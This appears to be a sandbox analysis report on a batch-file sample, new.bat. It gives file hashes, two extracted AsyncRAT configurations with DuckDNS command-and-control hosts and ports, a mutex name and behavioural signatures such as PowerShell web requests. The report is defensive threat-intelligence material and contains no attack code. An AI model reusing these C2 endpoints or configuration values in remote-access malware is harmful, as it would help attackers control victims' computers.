General

  • Target

    new.bat

  • Size

    4KB

  • Sample

    241216-vx5d6axjbq

  • MD5

    b79e56969d36c4b969bbe1623142e74a

  • SHA1

    a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd

  • SHA256

    6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960

  • SHA512

    fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356

  • SSDEEP

    96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

sdanarchynd.duckdns.org:7878

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

soasyncb.duckdns.org:6745

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Targets

    • Target

      new.bat

    • Size

      4KB

    • MD5

      b79e56969d36c4b969bbe1623142e74a

    • SHA1

      a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd

    • SHA256

      6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960

    • SHA512

      fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356

    • SSDEEP

      96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers written in C#.

    • Asyncrat family

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Async RAT payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • Enumerates processes with tasklist

MITRE ATT&CK Enterprise v15

Tasks